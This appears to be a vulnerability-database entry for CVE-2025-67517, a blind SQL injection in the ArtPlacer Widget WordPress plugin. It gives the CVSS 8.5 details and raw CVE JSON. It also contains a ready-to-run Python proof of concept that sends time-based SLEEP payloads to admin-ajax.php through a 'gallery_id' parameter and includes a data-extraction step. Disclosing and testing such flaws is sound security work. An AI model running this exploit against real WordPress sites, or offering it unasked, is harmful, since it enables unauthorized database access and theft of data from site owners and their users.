Security Vulnerability Report
中文
CVE-2025-67517 CVSS 8.5 HIGH

CVE-2025-67517

Published: 2025-12-09 16:18:25
Last Modified: 2026-04-27 18:16:40

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in artplacer ArtPlacer Widget artplacer-widget allows Blind SQL Injection.This issue affects ArtPlacer Widget: from n/a through <= 2.22.9.2.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

ArtPlacer Widget <= 2.22.9.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import time # CVE-2025-67517 ArtPlacer Widget Blind SQL Injection PoC # Target: WordPress site with ArtPlacer Widget plugin <= 2.22.9.2 TARGET_URL = "http://target-site.com/wp-admin/admin-ajax.php" def test_vulnerability(): """Test if target is vulnerable to CVE-2025-67517""" # Blind SQL Injection payload - time-based # This payload tests for SQL injection by introducing a 5-second delay sql_payload = "1' AND (SELECT * FROM (SELECT SLEEP(5))a) AND '1'='1" params = { 'action': 'artplacer_gallery_fetch', 'gallery_id': sql_payload } print(f"[*] Testing target: {TARGET_URL}") print(f"[*] Payload: {sql_payload}") start_time = time.time() try: response = requests.post(TARGET_URL, data=params, timeout=30) elapsed = time.time() - start_time print(f"[*] Response time: {elapsed:.2f} seconds") if elapsed >= 5: print("[!] VULNERABLE: Time delay detected - SQL injection confirmed") return True else: print("[-] Not vulnerable or patch applied") return False except requests.exceptions.Timeout: print("[!] VULNERABLE: Request timed out (expected behavior)") return True except Exception as e: print(f"[-] Error: {e}") return False def extract_data(): """Extract database version using blind SQL injection""" # Payload to extract MySQL version version_payload = "1' AND (SELECT * FROM (SELECT SLEEP(3) FROM (SELECT COUNT(*) FROM information_schema.tables)a)b) AND '1'='1" params = { 'action': 'artplacer_gallery_fetch', 'gallery_id': version_payload } print("[*] Extracting database information...") start_time = time.time() response = requests.post(TARGET_URL, data=params, timeout=30) elapsed = time.time() - start_time if elapsed >= 3: print("[!] Database query successful - blind injection working") print("[*] Use sqlmap or manual enumeration for data extraction") if __name__ == "__main__": if test_vulnerability(): print("\n[*] Running detailed enumeration...") extract_data()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67517", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:24.687", "lastModified": "2026-04-27T18:16:40.183", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in artplacer ArtPlacer Widget artplacer-widget allows Blind SQL Injection.This issue affects ArtPlacer Widget: from n/a through <= 2.22.9.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/artplacer-widget/vulnerability/wordpress-artplacer-widget-plugin-2-22-9-2-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}